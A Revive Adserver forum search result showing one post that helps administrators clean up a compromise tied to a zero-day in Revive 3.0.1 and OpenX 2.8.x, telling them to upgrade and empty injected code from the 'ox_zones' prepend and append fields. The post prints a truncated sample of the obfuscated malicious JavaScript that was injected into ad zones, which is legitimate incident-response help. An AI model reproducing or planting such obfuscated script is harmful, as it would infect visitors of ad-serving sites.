Jump to content

Search the Community

Showing results for tags 'trojan'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Using and Managing Revive Adserver
    • Documentation
    • Using Revive Adserver
    • Managing Revive Adserver
    • Bugs
  • Advanced Topics
    • Performance, Scalability, and Reliability
    • For Developers
  • Revive Adserver Community
    • Revive Adserver Project News and Announcements
    • Feature Requests
    • Plugins
    • Requests for Consulting
    • Off Topic

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL

Found 1 result

  1. If someone is suffering alerts from Avast alerting about some trojan in the invocation code as shown on #224 ( https://github.com/revive-adserver/revive-adserver/issues/224 ) please do the following: - Upgrade to revive-adserver-3.0.2 ASAP. The bug is present on =<revive-adsever-3.0.1 and on OpenX (confirmed on 2.8.7 to 2.8.11). This won't fix the problem but will prevent more attacks. More info at: http://www.kreativrauschen.com/blog/2013/12/18/zero-day-vulnerability-in-openx-source-2-8-11-and-revive-adserver-3-0-1/ - Look in 'ox_zones' table for any suspicious code. The code will be on the 'prepend' and 'append' fields. It will look something like: <script>try{$a=~[];$a={___:++$a,$$$$![]+\"\")[$a],__$:++$a,$_$_![]+\"\")[$a],_$_:++$a,$_$${}+\"\")[$a],$$_$$a[$a]+\"\")[$a],_$$:++$a,$$$_!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__{}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$ (...) - Empty those fields
×
×
  • Create New...